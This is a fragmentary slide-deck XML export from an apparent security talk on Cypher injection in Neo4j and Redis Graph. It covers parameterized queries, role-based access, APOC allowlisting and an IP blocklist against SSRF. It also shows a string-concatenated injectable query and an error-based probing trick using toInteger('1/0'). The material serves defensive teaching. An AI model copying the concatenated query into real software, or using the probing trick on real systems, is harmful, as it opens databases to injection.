          <a:xfrm>
            <a:off x="75700" y="1347688"/>
            <a:ext cx="8992600" cy="1415214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3679" name="Google Shape;3679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80" name="Google Shape;3680;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="5846" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="3437125"/>
            <a:ext cx="2091075" cy="167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4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p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454000" y="943250"/>
            <a:ext cx="6363900" cy="2875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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637050" y="2030700"/>
            <a:ext cx="7717500" cy="4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Remediation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&amp;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 Mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3687" name="Google Shape;368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825" y="2682925"/>
            <a:ext cx="2103800" cy="17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8" name="Google Shape;3688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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3133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Remediation</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3694" name="Google Shape;3694;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85900" y="869600"/>
            <a:ext cx="7020900" cy="6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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameterized Queries</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="1C4587"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3695" name="Google Shape;3695;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015800" y="1579175"/>
            <a:ext cx="8285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ession.run</a:t>
            </a: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("</a:t>
            </a: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MATCH </a:t>
            </a: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(c:Character) </a:t>
            </a:r>
            <a:endParaRPr b="1"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2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2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$name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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c",</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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{name: name}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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3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6" name="Google Shape;369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4350" y="3681065"/>
            <a:ext cx="2589650" cy="14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7" name="Google Shape;3697;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980450" y="2767825"/>
            <a:ext cx="8846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session.run("</a:t>
            </a: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MATCH</a:t>
            </a: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(c:Character) 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en" sz="2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' " + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="23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+ " ' +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8" name="Google Shape;3698;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7562" l="6362" r="6354" t="7562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132350" y="2767825"/>
            <a:ext cx="771900" cy="8559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99" name="Google Shape;3699;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6733" l="0" r="1400" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56150" y="1703500"/>
            <a:ext cx="921000" cy="65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00" name="Google Shape;3700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4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5" name="Google Shape;3705;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476600" y="1461100"/>
            <a:ext cx="7260000" cy="267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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="43322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Mitigations</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3707" name="Google Shape;3707;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432500" y="1069325"/>
            <a:ext cx="8771700" cy="22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b="1" lang="en" sz="2500"/>
              <a:t>RBAC support - u</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500"/>
              <a:t>sers, roles &amp; privileges</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="25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◆"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>Re</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>d / write</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="26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Roboto Condensed"/>
              <a:buChar char="◆"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>Built-in granular roles - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>, reader, editor,admin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3708" name="Google Shape;3708;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7289" l="8939" r="19483" t="25708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186956" y="259150"/>
            <a:ext cx="1749900" cy="92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09" name="Google Shape;3709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0" name="Google Shape;3710;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432500" y="2656900"/>
            <a:ext cx="8664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◆"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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Revoke privileges from roles</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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◆"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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Hardening capabilities per-user</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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711" name="Google Shape;3711;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51500" y="3743275"/>
            <a:ext cx="904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anjari"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Disable/allowlist Apoc procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="1155CC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b="1" i="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>(neo4j.conf)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="1155CC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b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>(4.3)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401700" y="1318625"/>
            <a:ext cx="8448300" cy="23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7" name="Google Shape;3717;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="43322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Mitigations</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3718" name="Google Shape;3718;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7289" l="8939" r="19483" t="25708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186956" y="259150"/>
            <a:ext cx="1749900" cy="92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19" name="Google Shape;3719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0" name="Google Shape;3720;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26250" y="1544824"/>
            <a:ext cx="9304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njari"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>unsupported.dbms.cypher_ip_blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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(4.4.4)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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873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njari"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>internal.dbms.cypher_ip_blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="25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(5.x)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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721" name="Google Shape;3721;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167400" y="2793475"/>
            <a:ext cx="891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unsupported.dbms.cypher_ip_blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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=0.0.0.0/0,::/0</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3722" name="Google Shape;3722;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920875" y="9907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In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="24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neo4j.conf </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3723" name="Google Shape;3723;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296175" y="3409075"/>
            <a:ext cx="8743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"access to $IP_ADDR is blocked via the configuration property </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2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unsupported.dbms.cypher_ip_blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="28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"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="28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3724" name="Google Shape;372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69660"/>
            <a:ext cx="9144000" cy="155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5" name="Google Shape;372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366968"/>
            <a:ext cx="9144002" cy="1242090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3726" name="Google Shape;3726;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325875" y="4746550"/>
            <a:ext cx="47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https://neo4j.com/developer/kb/protecting-against-ssrf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0" name="Shape 3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Google Shape;3731;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453675" y="1170125"/>
            <a:ext cx="636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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877625" y="202625"/>
            <a:ext cx="7237200" cy="25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word about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7300"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="7300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3733" name="Google Shape;3733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4" name="Google Shape;373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600" y="2101501"/>
            <a:ext cx="3109625" cy="10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5" name="Google Shape;3735;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326600" y="1856800"/>
            <a:ext cx="5508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Graph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p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518925" y="1359300"/>
            <a:ext cx="636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p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262725" y="1221000"/>
            <a:ext cx="785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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600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Parameterized queries are supported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3742" name="Google Shape;3742;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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Redis Graph</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3743" name="Google Shape;3743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4" name="Google Shape;3744;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1723525"/>
            <a:ext cx="80310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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1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Some procedures are supported (db.labels)</a:t>
            </a:r>
            <a:endParaRPr sz="2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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600" u="sng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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Substrings are supported</a:t>
            </a:r>
            <a:endParaRPr sz="2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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2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CASE WHEN - if-based  (with toInteger(‘1/0’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2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for error)</a:t>
            </a:r>
            <a:endParaRPr sz="2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745" name="Google Shape;3745;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527900" y="4746550"/>
            <a:ext cx="42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https://redis.io/commands/graph.query/#procedures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3746" name="Google Shape;374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723532"/>
            <a:ext cx="9144000" cy="136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7" name="Google Shape;3747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6200" y="1078350"/>
            <a:ext cx="8751600" cy="32566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1" name="Shape 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2" name="Google Shape;3752;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801725" y="1266225"/>
            <a:ext cx="6363900" cy="307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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="4657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Now</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3754" name="Google Shape;3754;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385175" y="783800"/>
            <a:ext cx="8688000" cy="15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anjari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Understand</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t> how Cypher injections work - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800" u="sng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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/noypearl/cypher-playground</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600" u="sng"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755" name="Google Shape;3755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3756" name="Google Shape;3756;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="2667700"/>
            <a:ext cx="872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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Bug bounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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- hunt for bugs in Cypher </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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757" name="Google Shape;3757;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="2082700"/>
            <a:ext cx="867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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Fix</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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existing injections in your applications</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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758" name="Google Shape;3758;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="3252700"/>
            <a:ext cx="654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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Reduce</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="26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attack surface</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="26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759" name="Google Shape;3759;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="375907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anjari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>Profit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3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4" name="Google Shape;376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975" y="1123849"/>
            <a:ext cx="7360031" cy="39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5" name="Google Shape;3765;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="365100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Cypher Injection Playground</a:t>
            </a:r>
            <a:endParaRPr sz="32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766" name="Google Shape;3766;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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  <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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3767" name="Google Shape;3767;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20355" l="1061" r="51739" t="53558"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="391138" y="951175"/>
            <a:ext cx="8361677" cy="38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8" name="Google Shape;376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650" y="951175"/>
            <a:ext cx="7704003" cy="4043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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555500" y="1065425"/>
            <a:ext cx="7842000" cy="2191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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="642800"/>
            <a:ext cx="8967600" cy="18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What is Cypher?</a:t>
            </a:r>
            <a:endParaRPr sz="7000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3190" name="Google Shape;3190;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829650" y="2018125"/>
            <a:ext cx="7512000" cy="19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(Open)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000"/>
              <a:t>Cypher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> Query Language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in simple words</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3191" name="Google Shape;319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2" name="Shape 3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3" name="Google Shape;3773;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647100" y="1359300"/>
            <a:ext cx="8208300" cy="209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4" name="Google Shape;3774;p80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&amp; Credits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3775" name="Google Shape;3775;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486200" y="1530425"/>
            <a:ext cx="868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jari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng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Cypher Injection Saga Writeup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="24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 - @Tempest Security </a:t>
            </a:r>
            <a:endParaRPr sz="24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njari"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Manjari"/>
                <a:ea typeface="Manjari"/>
                <a:cs typeface="Manjari"/>
                <a:sym typeface="Manjari"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/morkin1792/CIWA</a:t>
            </a:r>
            <a:endParaRPr sz="24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776" name="Google Shape;377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1" name="Google Shape;3781;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="12000"/>
          </a:blip>
          <a:srcRect b="22813" l="4226" r="27388" t="25677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="90930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2" name="Google Shape;3782;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295"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3783" name="Google Shape;3783;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679150" y="3790100"/>
            <a:ext cx="86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https://github.com/noypearl/cypher-playground</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="28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pic>
        <p:nvPicPr>
          <p:cNvPr id="3784" name="Google Shape;378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675" y="3923650"/>
            <a:ext cx="348475" cy="3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5" name="Google Shape;378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2363" y="1122925"/>
            <a:ext cx="2648324" cy="264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786" name="Google Shape;3786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7" name="Google Shape;3787;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838650" y="4598550"/>
            <a:ext cx="3128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@noypearl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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8" name="Google Shape;3788;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20294" l="11179" r="12769" t="13663"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="633400" y="4591500"/>
            <a:ext cx="484850" cy="42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9" name="Google Shape;3789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1650" y="4627787"/>
            <a:ext cx="348475" cy="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0" name="Google Shape;3790;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="465775"/>
            <a:ext cx="7704000" cy="27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Try it yourself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5" name="Shape 3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6" name="Google Shape;3196;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="1811475"/>
